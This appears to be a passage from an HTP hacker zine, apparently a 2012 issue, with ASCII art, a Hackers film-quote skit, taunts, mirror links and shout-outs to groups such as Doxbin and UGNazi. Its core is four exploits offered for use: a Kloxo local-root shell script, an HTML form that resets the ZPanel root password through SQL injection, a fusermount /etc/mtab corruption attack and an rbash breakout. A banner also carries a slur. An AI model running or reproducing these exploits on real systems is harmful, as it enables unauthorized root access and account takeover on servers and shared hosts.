▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█▓░ ▓█▓░ ░ ░ ░▓█▒ ░ ░░▓█░ ░ ░█▓░ ░ ░ ░░▓█▓░░░ ░░▓█▓░ ░ █
██▓ ▓█▓░ ░░▓█▓░░ ░ ▒▓█░ ░ ░██▓ ░ ░ ▒▓█▓░░ ░ ░ ░▓█▓░░ █
██▓░ ░▓█░ ░ ░▓█░░ ░ ░▓█▓░░░░██▓░░ ░ ░▓█▓▒ ░ ░ ░░▓█▓░░ █
▓██▓ ░█▓ ░ ░ ░▓█▒ ░ ░░▓█▒░ ░█▓█▒░ ░ ░░▓█▓░░ ░ ░ ░ ░▓█▓░ ░ █
███▓░ █░░ ░ ░ ░░▓█░░ ░ ░▓█░ ░█▓█▓ ░░ ░░░▓██▓░░ ░ ░░ ▒▓█▓░ ░ ░█
▓███ ░█▓░ ░ ░ ░ ▓█░ ░ ░▓█░█▓█▓ ░ ░ ░ ░▓███▓░ ░ ░░ ░░▓█▓░░░ ░ █
█▒▓█░▓█▓░░ ░ ░░▓█▓░ ░ ░ ▒██▓█░░░ ░░ ░ ░ ░▓████▓░░ ░ ░░░▓▓█▓░▓░ ░ ░█
░▓██▒ █░░ ░░ ░░ ░▓█░ ░ ░ ░ ▒▓█░▄▄███▀▀▀▀▀▄██████▓░ ░ ░░ ░░▓▓████▓▓▓░ ▓█
▓░▓█▓░ █▓▄█▄░░░ ░ ▓█░░ ░ ░░░░░░███ ▀▀▄░░ ░▀████▓░ ░ ░░▓▓███████▓░▓░ ░▓█
▓░▒▓█▓░██████░ ░ ░▓█▒░ ░ ░ ░░▄▄▀░░░▀▀▀▄▄ ▀▄░ ░▓███▓▒░░░▓▓██████████▓▓▓░ ███
░░ ▓█▓▓███████░░ ░▓█▓ ░ ░░░▄▀░░ ░ ░▓██▄░░█▄░ ░▓███▓░▓▓███▓██▓▓██▓██▓▓ ░ ░▓██
░ ░ ░█▓████████░░░░▓█░ ░░▓█░ ▄██▄▄░░ ░▓█▓ ▓█▓ ░▓███▓▓███▓▓█▓▓░░▓▓███▓█▓ ░▓█▓█
░░ ░▓██████████░ ░▓█░░░▓█ ▓█▓▓░█▓█▀█▄░ ░▓█ ░█▓░ ░▓██▀███▓█░░ ░ ░░░▓█▓█▓█▓▓████
▓░ ░░▓███████████░ ▓█▒ ▓█▓░█▓█░▓▓ ░▓▓██▓ ░█░ ▓█ ░░▓█▓██▓░░░▓░ ░ ░ ░█▓█▓▓▄█▓▓▓█
█▓░ ▓████████████░░░▓░ █░ ░██▓▓░ ░░░█▓██░ ▓ ░█░░ ░▓█▓▓░ ░ ░ ░ .░ ███▓▓▓▓▓░█
▓█▓░▓█████████████░ ░ ░█▓░█▓▓▓░ ░░▓░▓░██▓░ ░ ▓█░ ░▓█▓▒ ░ ░█▓█▓▓▓█░ █
█▓█▓▓████████▓█▓███░ ░ ▒█ ██▓░▓ ░ ░░▓█▓██▓░░ ░█ ░ ░█▓ ░ ░█▓█▓█▓ ░█
▓█████████▓█▓▒▓█▓██░ ░░█░█▓░▓░ ░ █▓███▓░ ░ ▓░ ▓█░ ██▓█░ █
░▒▓█████▓▓▒░ ░░█▒█▓█░ ░ █▓██▓░ ░ ░▓░▓█████▓░ ░ ░▓█░ ░█▓▒ ░ █
░ ░▓███▓█▓░ ░ ░ ░▓██▒ ░█░█▓▓░ ░ ░▓██░░ █░ ░ ░ ░█ ░█▓░░░█
░ ▓███▒░ ░ ░█▓█░░█▒█▓░▓▓ ░▄▄▀▀░░░ █▓░ ░ ░█░ ░█▓▒▓██
░░███▓ ░ ░▒ █▒█▓█▓██▄▀▀ ░░░░░░░ █ ░ ▓█ ███▓▓█
░ ▓███░ . ░ ████▀▀ ░░ ░░░░ ░ █░ ░ ░█░ █▓▓█▓█
░ ░▓██▓░ ▀▀ ░ ░░░░░░░ █░░ ░ ░█░ ░ ░██░░█
░▒████▒░ ░░░░░░ █▓░ ░░█░ ░▓ ░█░ █
░▒▓████▓ ░ ░ ░░░░░ █▓░ ░░█▓ ░█░ █▓░ █
▓█▓█▓██▓░ ░░░░░░ █▓ ░ ░ ░█░ █▓░ ░ ▄█▓░ █
█▓██████░ ░ ░░░░ █░░ ░ ░█▓ ▓█▄░▄▄██▓░ █
████████▒░ ░░░░░ ░█▓ ░ ░░░█ ░▀▓▓█▓█▓▓ ░ █
░█████▓▀█▄░ ░ ░ ░░ █░░ ░ ░░░█░ ░░ ░█▓▒░░ ░▄█
░░███▓░▓ ▀▄░ ░░░ █░▓░ ░ ▓█░ ░ ░█▓▓▓▄▀░█
▀░▀████▄▓░ ▀▄░░ ░ ░ ░ ░ ░ ░░█ ░▓░░░█░ ░ ░██▀░ █
░░░██▓▓███▄░ ▀▄░░ ░▓ ░ ▄▄▀█ ░▓░ ░█▓ ░░ ░ ░ ░░░░ ░ ██
.░░████▄▀█ ▀▄░ ▀▄░░ ░░▓█▓░ ░ ▄▀▀░░░█░▓▓▓░█░ ░░░ ░▄▄▄▄░ ░ ░ ░▄███
░░░████▓██░ ▀▄░ ░▀▄░░ ▓█░ ░ ░░█▓ ░ ░░█░▓▓░█░ ░ ░ ░░░▄▄▀▀▀░░▒▓█▄░░░ ░ ░▄██▓█
░ █░███▓█░ ▀▄ ░█▄░░▓ ░ ░ ░█▓ ░░▓█ ░▓█░ ░ ░░ ░▄▄▀ ░ ░░▒▓█░ ░░ ░██▓██
░ ░█ █▓██▓█ ░██▄░▓██░█░░ ░ ▓██░ █ ░▓█▓░░ ▄▄▀▀ ░ ░ ░▄▄▀░░ ░ ░████░█
░ ▓░██████░ █ █▀▄██▓█▓ ░ ░▓█▓ ░█░▓███▄▄▀▀░ ▄▄▄▄▄██▓░░░ ░ ░███▓░█
░ ▓ █░██▄██▄▄ ▀█▄▀░▀█▓░░▀░ ░▓░. █░▄█▀▀▀░░▄▄▄▄█▀▀▀▀ ░█▓█░ ░ ░ ░██▓▒█
░ ▓ █░██████████▄▄▄▄▄██▓ ░██░▄▄░▓▄▄▀▀█░█▄▄▄▀▀█ ▀█▀▄ ░▄██▓░░░ ░▀██▓█
░ ░ ▓ █████████████████▄░▓█▓ █▓██▄▄██████░ ▀▀▀ ▄█▓░░ ░ ░ ░░█▓█
░ ▀ ▓ █████████████▓▓▓▓▓▓▀▓░░░░░▓▓▓████████▄ ▄█▓░ ░ ░ ▄█▄▄█▀██
░ ░░ ▓░░██████████▓▓▒░░░▒▓█▓░░░░░░░░▓▓▓▓██████████████▄▄█▓▓░ ░ ░░▄███▓░▓▄▀█
▓ ░████████▓▓░ ░ ░ ▒▓░░░░ ░ ░ ░░░░▓▓▓▓▓▓█████████▓▓░░ ░░▄▀▀▀▀██▀▀ █
░ ░ ░█████▓█▒░ ░ ░░▀ ░░ ░░ ░░ ░░ ░░░░░░▓▓▓▓▓▓▓▓▓░░ ░░█░ ░ ▄▀█
░ ░ ░ ░██████▓░ ░ ░█░ ░ ░ ░ ░ ░ ░░ ░░░░░░░░░ ░ ░█▓░ ░ ▄▀░ █
░ ░ ░ ░ ░████▓█▒░ ░ ░ ░ ░ ░ ░██▄▄▄█▀░░ █
░ ░ ░ ░████▒░ ░ ░█▓░ ░ ░ ░████▓▓░ █
░ ░ ░░███▓█▒░ ░▄▀█░ ▄▄▄▄▄ ░██████▓▒ ░█
░ ░ ░███▓█ ░ █▓█▓ ░ ░▓███░ ░█▓█▓████▓░ ░ ▄█
░ ░███▓▒ ░ ▀███▄▄▄▄▄ ░ ░▓█ ░█▓█▓▓█▓███▄░▀▀ █
░ ░ ██▓█░ ░ ▓▀▀▀▀░░ ░ ▄▄▀░ ░▓ ░█▓▓░░░░▒▓▓███ █
▀░░██▓▒░ ▓█▀▀▄▄▄▄▄▄▄▄▀▀▄▀ ░ ░█▓░ ░ ░ ░ ▒▓▓█░ █
░ ░ ░ ░░███░ ░▀▄ ▄▄▀ ░█▓░░░.░ ░░░▒▓█ ░█
░ ░░██▓░ ░ ░█▀▀▀▀▀▀▀ ░█▓░ ░ ░ ░▓█░ █
░ ░ ░██▓▒ ▄ ░█▓░ ░░ ░ ▓██▄█
░ ░ ░██▓▒░░ ░█████▄▄ ▄█▓░░░ ░▓█▓▓█
░ ░ .░██▓▒░░▒▓█▓▓▓▒░▀▄ ▄██▓░ ░ ░ ░ ░ ▓█▒░█
░ ░ ░██▓▒ ░▒▓▒░ ░░ ▄███▓░ █░ ░░▓█░█
░ ░ ░ ░ ░ ░ ░▀█▓▓▒░ ░ ░ ▄▄█████▓░ ░█░ ░▓█░█
░ ░ ░ ░ ░ ░▀█▓░░ ░ ▄▄████████▓░ ░█░ ░▓█░█
░ ░ ░ ░ ▓ ▓ ░▀█▄░ ░ ▄▄████▓█▓██▓█▓░ ░▓░ ░░▓█░█
░ ▀ ░ ░ ░ ▓░░ ▓░░ ▓ ░▀██▄▓▓▒░ ░▄▄█████▓▓▓▒▓█▓▓█▓░ ░█░ ░▓█░█
░ ▓ ░ ░ ░ ▓ ▓ ▓ █ ▓ ▓ ░█████████████▓▓▓▒░ ░░▒▓█▓░ ░█░ ░▓█░ █
▓ ░ ▓ ░ ░ ▓ █ ▓░█░█░█ ▀░███▓█▓▓▓▓▓▓▓▓▒░ ░ ░░▒▓█▓░ ▄█░ ░ ░▓█░░█
░ █ ░ ▓ ░ ▓░█ ▓░█░█ █████▄░██▓█▓▓░░ ░░░ ░░ ░.░░░▄██▓░ ░▄██░ ░▓█░ ░█
░░█ ▓░█ ░ ▓ █░▓ █░██████▀▀▀█▓█▓▒░ ░ ░ ░░ ░░▄█▓▓░ ░█▓█░ ░ ░ ░▓█░░ █
▓ █░▓ █ ▀ █░█░█░███▀▀░ ░░▄█▓█▓░ ░░ ░▄█▓▓░ ░ ░█▓▓▓█░ ░ ░▓█░░ ░█
▓░█ █░█░▓ █░█ █▄█▓░░░ ░▄█▓░▒▓█▓░░ ▄█▓▓░░ ░ ░ ░███████▄ ░ ▀ ░ ░ █
█ █░█ █ ▓ █.███▓▓░░ ░▄█▓▒ ░ ░▓▒░ ░ ▄█▓█▓░▓▄▄▄▄▀▀▀▀▀░░░ ░░▀▀▀▀▀▄▄▄▄▄.░ ░▄░█
█░█ █░█░█░████▓░██▄▄▀▀▀▀▄▄▄▄▄░░ ░ ░ ▄▄█████▀▀▀▀░ ░ ░░░ ░ ░ ░░░░░░ ░░░▀▀▄█▀░ █
█░███░██████▀▀▀▀ ░░ ░ ░░ ░░░░▀▀▀▀▀▄▄▀░░░ ░░ ░ ░ ░░. ░ ░ ░ ░ ░░░▀ ░█
█ ███▄█▀▀▀░░░ ▀░ ░ ▀ ░ ░░▄▀░ ░ ░ ░ ░ ░ ░ █
███▀▀▓ ░ ░ ░ ░ ░ ░ ░ ▓ ░ █
██▓▓░ ░ ░ ░ ░ ░ ▓░ ░ █░░ ▓ ░ ░ ░ ░ █
█▓░ ░ ▓ ▓ ░ ░ ░ ░ ░ ░ ▓ ░ █ ░ █ ▓ █░ ░ ░ ░ █
░ ░ ▀ ░█ ▓ ▓ ▓. ▓ ░▓. ░ ░░░█ ▓░█░ ░ ░ ░ ░ █░█░█░░ ░ ░ ░ ▓ ░ ░ █
▓ ░ ▓ ▓░█░█ ▓░█░▓█░░░█ ░▓ ░▓ █░█░█░▓░ ░░▓░ ░░ ▓██▓█▓▓░░▓░▓░ ░ ▓ ▓ █
░░▓▓░▓█▓█▓█▓█░████▓░▓█░░█░▓░█░█▓███▓░█▓█▓░░█▓█▓▓███████▓█▓░░░ ░ ░ █ ░ ▓ █
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
0x05
▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█ █ █ █ █ █ █ █ ▄▀ █ bl1ng bl1ng niqqa █▒
█ █ █ █ █▀▀█ ▀▀▀█ ▄█ █ :PPppPPpppPp █▒
█▄▄█ █▄▄▀ █ █ ▄▄▄█ █▄▄▄█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▒
<HAL> We have a Zero Bug attacking all the login and overlay files.
<PLAGUE> Run anti-virus. Give me a systems display!
* The systems display comes up. Red flashes everywhere, signifying new attacks.
* PLAGUE presses a key.
<PLAGUE> Die, dickweeds!
<HAL> The rabbit is in the administration system.
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
#!/bin/sh
# HTP LXLabs Kloxo lxsuexec+lxrestart local root 0day
# requires you to be the apache user
LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`
export MUID=$LXLABS
export GID=$LXLABS
export TARGET=/bin/sh
export CHECK_GID=0
export NON_RESIDENT=1
echo "export PS1='HTP# '" > /tmp/rc
echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/rc #' " > /tmp/pwn
lxsuexec /tmp/pwn # get root!
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
<html>
<head>
<title>ZPanel Remote Unauthenticated Root PW Reset</title>
<meta name="author" content="joepie91" />
<meta name="owned-by" content="HTP" />
</head>
<body>
<form method="post" action="http://[target]/zpanel/?resetkey='%20OR%20'1'='1">
<input type="hidden" name="inConfEmail" value="' OR '1'='1">
<input type="hidden" name="inNewPass" value="newpasswordgoeshere">
<button type="submit">Sploit!</button>
</form>
</body>
</html>
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
#!/bin/sh
# HTP '12
# Return of the `fusermount` /etc/mtab corruption 0day + `mount` parsing failure
# htp on /tmp/.. type fuse.htp-fs (rw,suid,dev,user_id=0,group_id=0)
export _FUSE_COMMFD='1337'
export opz="dev\,user_id=0\,group_id=0"
mkdir "/tmp/..`echo -en '\x0b\x0c'`suid"
fusermount /tmp/..*suid -osubtype="htp-fs`echo -en '\x0b\x0c'`htp",fsname="$opz"
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
#!/bin/bash
# -HTP '12 rbash-break.sh
# -rbash (bash restricted shell) breakout
# Shared boxes often use rbash (bash -r) to confine users into their home
# directory (after setting $PATH to a location with trusted binaries). rbash
# enforces the restricted shell by guarding against PATH exports (through both
# shell builtins and its config files).
# Example session:
# [hack@theplanet ~]$ cd /bin
# bash: cd: restricted
# [hack@theplanet ~]$ export PATH='/'
# bash: PATH: readonly variable
# [hack@theplanet ~]$ echo $PATH
# .
# [hack@theplanet ~]$ echo "export PATH=/bin/">.bashrc
# bash: .bashrc: restricted: cannot redirect output
# The builtins were the first to get owned, but the most straightforward method
# had to be using HISTFILE to subvert the pipe restriction.
echo "[~] rbash-break.sh ~ HTP '12 ~ Restart shell upon script completion"
history -c
export HISTFILE="~/.bashrc"
export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin"
exit
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
[~] See 0x07: Files for encrypted fuze 1.2 + CF6 bypass
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
0x06
▄▄▄▄
█ █ ▄▄▄▄▄▄ ▄▄▄▄
█ █ █ █ █ █▄█ █ █
█▄▄█ █▄█ █ █▀▄ █▄▄█
ARF ARF!
WE GOTCHA!
MESS WITH THE BEST
DIE LIKE THE REST
* Disconnected (Hack the Planet!)
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
0x07
▄▄▄▄
█ ▄ ▄ ▄▄▄ ▄▄▄▄
█▀▀ █ █ █▄▄ █▄▄
█ █ █▄▄ █▄▄ ▄▄▄▀
> http://htp4.hack-the-planet.tv/htp4/
> http://doxbinumfxfyytnh.onion/HTP4.7z
> http://uplink.sh/htp4/
> http://dikline.org/
> http://empathy.hardchats.org/htp4/HTP-4.txt
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
0x08
▄▄▄▄
█ ▄ ▄ ▄▄▄▄ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄
▀▀▀█ █▄▄█ █ █ █ █ █ ▄▄▀
▄▄▄█ █ █ █▄▄█ █▄▄█ █ █▄▄▄
> Doxbin
> UGNazi
> Dikline
> ACL
> GNY
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF